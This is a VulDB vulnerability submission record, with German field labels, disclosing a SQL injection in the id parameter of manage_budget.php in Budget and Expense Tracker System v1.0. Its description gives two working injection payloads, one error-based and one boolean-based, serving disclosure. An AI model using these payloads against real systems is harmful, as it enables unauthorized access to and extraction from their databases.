| Titel | Budget and Expense Tracker System v1.0 /expense_budget/admin/budget/manage_budget.php GET parameter id exists SQL injection vulnerability |
|---|
| Beschreibung | An issue was discovered in Budget and Expense Tracker System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /expense_budget/admin/budget/manage_budget.php?id.
Payload1: id=1' and (select 2 from(select count(*),concat(0x55565758,(select (elt(888=888,1))),0x65666768,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'a'='a
Payload2: id=1' and 777=777 and 'GSD'='GSD |
|---|
| Quelle | ⚠️ https://github.com/wucwu1/CVEApplication/blob/main/SQL.md |
|---|
| Benutzer | wucwu1 (UID 46807) |
|---|
| Einreichung | 17.05.2023 03:38 (vor 3 Jahren) |
|---|
| Moderieren | 17.05.2023 18:53 (15 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 229278 [SourceCodester Budget and Expense Tracker System 1.0 GET Parameter manage_budget.php ID SQL Injection] |
|---|
| Punkte | 20 |
|---|